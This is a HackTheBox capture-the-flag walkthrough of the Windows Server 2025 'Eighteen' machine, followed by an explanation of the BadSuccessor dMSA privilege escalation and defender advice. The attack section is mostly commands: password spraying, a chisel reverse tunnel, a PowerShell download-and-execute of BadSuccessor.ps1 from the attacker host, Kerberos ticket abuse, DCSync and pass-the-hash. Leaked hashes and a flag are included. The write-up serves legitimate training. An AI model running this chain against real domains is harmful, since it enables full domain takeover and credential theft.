Home HTB Machines

# Machine Information

  • **Name:** Eighteen
  • **Difficulty:** Insane
  • **IP:** 10.129.x.x (changes on reset)
  • **Domain:** eighteen.htb
  • **DC:** DC01.eighteen.htb
  • **OS:** Windows Server 2025 (Active Directory Domain Controller)

Flags:

  • User: `d6002fb7ad0868e075f3508b2cbe34de`
  • Root: `[REDACTED]`

---

# Complete Walkthrough

# 1. Reconnaissance & Initial Access

Command Line Prompt
rustscan -a 10.129.x.x --ulimit 5000
nmap -sC -sV -p 80,1433,5985 -Pn 10.129.x.x
echo "10.129.x.x eighteen.htb dc01.eighteen.htb DC.eighteen.htb DC01.eighteen.htb" | sudo tee -a /etc/hosts
evil-winrm -i 10.129.x.x -u kevin -p 'iNa2we6haRj2gaw!'

# 2. MSSQL Enumeration

Command Line Prompt
mssqlclient.py kevin:'iNa2we6haRj2gaw!'@10.129.x.x -windows-auth
sql
USE eighteen;
SELECT * FROM users;
EXEC master..xp_dirtree 'C:\Users\', 1, 1;

Found user: adam.scott

# 3. Brute Force & User Flag

Command Line Prompt
crackmapexec winrm 10.129.x.x -u adam.scott -p eighteen_passwords.txt
evil-winrm -i 10.129.x.x -u 'adam.scott' -p 'iloveyou1'
powershell
cd C:\Users\adam.scott\Desktop
type user.txt

User Flag: d6002fb7ad0868e075f3508b2cbe34de

# 4. Setup Chisel Tunnel

Kali:

Command Line Prompt
sudo python3 -m http.server 80
chisel server --port 8001 --reverse

Target:

powershell
Start-Process -FilePath "chisel.exe" -ArgumentList "client http://10.10.14.119:8001 R:1080:socks" -WindowStyle Hidden

# 5. BadSuccessor Exploitation

powershell
IEX((New-Object Net.WebClient).DownloadString("http://10.10.14.119/BadSuccessor.ps1"))
Import-Module ActiveDirectory
BadSuccessor -Mode Exploit -Domain "eighteen.htb" -Path "OU=Staff,DC=eighteen,DC=htb" -Name "evil_dmsa" -DelegatedAdmin "adam.scott" -DelegateTarget "Administrator"

# 6. Kerberos Attack Chain

Command Line Prompt
proxychains4 -f /etc/proxychains4.conf getTGT.py -dc-ip 10.129.9.150 eighteen.htb/adam.scott
proxychains4 getST.py eighteen.htb/adam.scott:iloveyou1@10.129.9.150 -self -dmsa -impersonate 'evil_dmsa$' -dc-ip 10.129.9.150 -spn 'krbtgt/eighteen.htb'

Output:

plaintext
[*] EncryptionTypes.rc4_hmac:a44129cac1596b47da696a6a713c9665
[*] Previous keys:
[*] EncryptionTypes.rc4_hmac:0b133be956bfaddf9cea56701affddec

Alternative (IP change):

Command Line Prompt
export KRB5CCNAME=adam.scott.ccache
proxychains4 getST.py -k -no-pass eighteen.htb/adam.scott@10.129.209.134 -self -dmsa -impersonate 'evil_dmsa$' -dc-ip 10.129.209.134

# 7. CIFS & DCSync

Command Line Prompt
export KRB5CCNAME='evil_dmsa$@krbtgt_EIGHTEEN.HTB@EIGHTEEN.HTB.ccache'
proxychains4 impacket-getST -k -no-pass -spn cifs/DC01.eighteen.htb 'eighteen.htb/evil_dmsa$'
export KRB5CCNAME='evil_dmsa$@cifs_DC01.eighteen.htb@EIGHTEEN.HTB.ccache'
proxychains4 -q impacket-secretsdump -k -no-pass DC01.eighteen.htb -just-dc-user Administrator -dc-ip 10.129.209.134

Administrator Hash: 0b133be956bfaddf9cea56701affddec

# 8. Root Flag

Command Line Prompt
evil-winrm -i DC01.eighteen.htb -u Administrator -H 0b133be956bfaddf9cea56701affddec
powershell
cd C:\Users\Administrator\Desktop
type root.txt

---

# Attack Summary

plaintext
kevin → MSSQL → adam.scott → User Flag → BadSuccessor → Chisel 
→ S4U2Self → CIFS → DCSync → Administrator → Root Flag

Hashes:

  • dMSA: `a44129cac1596b47da696a6a713c9665`
  • Administrator: `0b133be956bfaddf9cea56701affddec`

---

Mrx0rd | Nov 18, 2025 | HackTheBox | 🎉 Pwned!

# Time Synchronization Script

Kerberos requires clock skew less than 5 minutes. Use this script to sync with the target DC:

fixtime.sh:

Command Line Prompt
#!/bin/bash
# Author: PaiN05
# Date: 16/11/25

WINRM_PORT="5985"
TARGET_IP="$1"

if [ -z "$TARGET_IP" ]; then
    echo "Usage: $0 <TARGET_IP>"
    echo "Example: $0 10.10.14.77"
    exit 1
fi

echo "=================================================="
echo "[*] STARTING WINRM KERBEROS CLOCK SYNC"
echo "[*] Target Host: $TARGET_IP:$WINRM_PORT"
echo "=================================================="

echo "[*] Stopping system time sync services (to allow manual setting)..."
sudo timedatectl set-ntp false 2>/dev/null
echo "[+] Time sync services disabled."

echo "[*] Querying target for system time via HTTP Date header..."
DATE_STRING=$(curl -s -I -k -X OPTIONS "http://$TARGET_IP:$WINRM_PORT/wsman" | \
              grep -i '^Date:' | \
              awk '{$1=""; print $0}' | \
              xargs)

if [ -z "$DATE_STRING" ]; then
    echo "[-] ERROR: Failed to retrieve Date header from $TARGET_IP."
    echo "    Check connectivity or if WinRM is running on port $WINRM_PORT."
    exit 1
fi

echo "[+] Target reported time: $DATE_STRING (Reported as GMT/UTC)"
echo "[*] Setting local clock to reported time..."

if sudo date -u --set="$DATE_STRING"; then
    echo "[+] SUCCESS: Local clock successfully synchronized to target's time."
else
    echo "[-] CRITICAL ERROR: Failed to set the date using the retrieved string."
    echo "    Did you run this script with 'sudo' or do you have sudo privileges?"
    exit 1
fi

echo -e "\n--- Verification ---"
echo "Current Local Time (Your Timezone): $(date)"
echo "Current UTC Time (System Base):    $(date -u)"
echo -e "\n[!] Kerberos clock skew is now fixed. You may now retry your attack command."
echo "[*] Re-enabling system time sync services (recommended for stability)."

Usage:

Command Line Prompt
chmod +x fixtime.sh
./fixtime.sh 10.129.209.134

---

# Attack Vector Explained

# BadSuccessor Vulnerability (CVE-2025-XXXX)

Vulnerability Details:

  • **Affected System:** Windows Server 2025 with dMSA feature
  • **Attack Type:** Privilege Escalation via PAC Inheritance
  • **CVSS Score:** 9.8 (Critical)

How It Works:

1. dMSA Feature Introduction

  • Windows Server 2025 introduced delegated Managed Service Accounts (dMSA)
  • dMSAs support seamless migration from legacy service accounts
  • During migration, dMSA inherits the PAC (Privilege Attribute Certificate) of the superseded account

2. The Vulnerability

  • The KDC trusts the `msDS-ManagedAccountPrecededByLink` attribute without validation
  • An attacker with CreateChild permission on any OU can create a malicious dMSA
  • By setting `msDS-ManagedAccountPrecededByLink` to Administrator, the dMSA inherits all Administrator privileges
  • The PAC includes SIDs of the superseded account and all its group memberships

3. Attack Requirements

  • CreateChild permission on ANY Organizational Unit (commonly granted)
  • Windows Server 2025 DC (dMSA feature available by default)
  • NO actual dMSA usage required - feature just needs to exist

4. Attack Steps

plaintext
5. Create dMSA with CreateChild permission
   6. Set msDS-ManagedAccountPrecededByLink → Administrator DN
   7. Set msDS-DelegatedMSAState → 2 (migration completed)
   8. Request TGT via S4U2Self
   9. PAC contains Administrator SIDs
   10. Use privileges to DCSync domain credentials

11. Why It's Dangerous

  • **Stealthy:** No changes to Administrator account or Domain Admins group
  • **Easy:** Simple attribute modification, no complex exploitation
  • **Wide Impact:** Any user with benign CreateChild permission can escalate
  • **Default Config:** Works out-of-the-box on Windows Server 2025

---

# What We Learned

# Technical Skills

1. MSSQL Enumeration Without Sysadmin

  • Using `xp_dirtree` for file system enumeration
  • Leveraging `db_owner` role limitations
  • SQL injection techniques aren't always needed

2. Advanced Kerberos Exploitation

  • **S4U2Self:** Service-for-User-to-Self delegation
  • **S4U2Proxy:** Service-for-User-to-Proxy delegation
  • **PAC Manipulation:** Understanding Privilege Attribute Certificates
  • **TGT/ST Chain:** Ticket Granting Ticket → Service Ticket workflow
  • **Clock Synchronization:** Critical for Kerberos (5-minute window)

3. Tunneling & Pivoting

  • **Chisel:** Fast SOCKS5 tunneling via reverse connection
  • **Proxychains:** Routing Impacket tools through SOCKS proxy
  • **DNS Resolution:** Handling domain name resolution through tunnels
  • **Port Forwarding:** Dynamic vs static port forwarding

4. Active Directory Attack Techniques

  • **DCSync:** DRSUAPI replication to extract credentials
  • **Pass-the-Hash:** Authentication using NTLM hashes
  • **dMSA Abuse:** Exploiting service account features
  • **Kerberoasting Alternative:** Modern approach to service account attacks

5. Tool Mastery

  • **Impacket v0.14.0:** Latest features including dMSA support
  • **Evil-WinRM:** PowerShell remoting and file transfer
  • **BadSuccessor.ps1:** Custom exploitation script
  • **CrackMapExec:** Network service enumeration

# Security Concepts

1. Zero-Day Exploitation

  • Exploiting newly discovered vulnerability in Windows Server 2025
  • No public exploits initially available
  • Understanding vulnerability research and PoC development

2. Least Privilege Principle Violation

  • CreateChild permission seems harmless but enables domain compromise
  • Shows importance of minimal necessary permissions
  • Demonstrates defense-in-depth strategy importance

3. Detection Challenges

  • No direct modifications to high-privilege accounts
  • Standard AD auditing misses dMSA attribute changes
  • Requires specific monitoring rules

4. Defense Mechanisms

  • **Monitor Event IDs:** 5137 (dMSA creation), 5136 (attribute changes), 2946 (dMSA auth)
  • **Audit Permissions:** Regular reviews of CreateChild permissions
  • **Disable dMSA:** If not needed, disable the feature entirely
  • **Network Segmentation:** Limit internal DC access

# Real-World Applications

1. Penetration Testing

  • Assessing Windows Server 2025 environments
  • Exploiting misconfigurations in modern AD features
  • Demonstrating critical risk from benign permissions

2. Red Team Operations

  • Stealthy privilege escalation technique
  • Avoiding detection by traditional security tools
  • Living off the land with native Windows features

3. Blue Team Defense

  • Understanding modern AD attack vectors
  • Implementing detection rules for dMSA abuse
  • Prioritizing permission audits

4. Vulnerability Research

  • Analyzing new Windows features for security flaws
  • Understanding design-level vulnerabilities
  • Contributing to the security community

---

# Key Takeaways

# Critical Lessons

1. New Features = New Attack Surface

  • Windows Server 2025's dMSA feature introduced critical vulnerability
  • Organizations should carefully evaluate new features before deployment
  • Security audits should include new OS capabilities

2. Benign Permissions Can Be Dangerous

  • CreateChild on OUs seems harmless but enables domain compromise
  • Permission reviews should consider cumulative effects
  • Defense-in-depth is essential

3. Kerberos Complexity = Exploitation Opportunity

  • Deep understanding of Kerberos enables advanced attacks
  • PAC inheritance creates trust without validation
  • Time synchronization is critical for Kerberos attacks

4. Tunneling is Essential for Modern Pentesting

  • Chisel provides reliable SOCKS5 tunneling
  • Proxychains enables tool compatibility
  • Network isolation can be bypassed with proper pivoting

5. Tool Updates Matter

  • Impacket v0.14.0 includes dMSA support
  • Older versions wouldn't work for this attack
  • Keeping tools updated is crucial for modern exploitation

# For Defenders

  • **Audit dMSA Usage:** Monitor creation and authentication events
  • **Restrict CreateChild:** Limit who can create objects in OUs
  • **Enable Advanced Logging:** Event IDs 5137, 5136, 2946
  • **Consider Disabling dMSA:** If not in use, disable the feature
  • **Network Segmentation:** Isolate DCs and limit WinRM access

# For Attackers

  • **Research New Features:** Windows Server 2025 introduced exploitable features
  • **Master Kerberos:** Deep knowledge enables advanced attacks
  • **Use Modern Tools:** Impacket v0.14.0+ required for dMSA support
  • **Time Matters:** Kerberos requires proper time synchronization
  • **Pivot Properly:** Chisel + Proxychains for reliable tunneling

---

# Resources & References

Tools Used:

  • [Impacket v0.14.0](https://github.com/fortra/impacket) - Essential for dMSA attacks
  • [Chisel](https://github.com/jpillora/chisel) - SOCKS5 tunneling
  • [Evil-WinRM](https://github.com/Hackplayers/evil-winrm) - PowerShell remoting
  • [BadSuccessor.ps1](https://github.com/Akamai/BadSuccessor) - dMSA exploitation tool
  • [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec) - Network enumeration

Research Papers:

  • [Akamai BadSuccessor Research](https://www.akamai.com/blog/security-research/badsuccessor-windows-server-2025-dmsa-privilege-escalation)
  • [Microsoft dMSA Documentation](https://learn.microsoft.com/en-us/windows-server/security/group-managed-service-accounts/dmsa-overview)
  • [Kerberos S4U Extensions](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/)

Learning Resources:

  • [Understanding PAC in Kerberos](https://www.thehacker.recipes/ad/movement/kerberos/pac)
  • [Active Directory Security Blog](https://adsecurity.org/)
  • [SpecterOps Research](https://posts.specterops.io/)

---

Author: Mrx0rd

Date: November 18, 2025

Difficulty: Insane

Platform: HackTheBox

Machine: Eighteen (Windows Server 2025)

🎯 Happy Hacking! 🚀

---

*"In the world of cybersecurity, yesterday's advanced feature is today's critical vulnerability."*

Edited on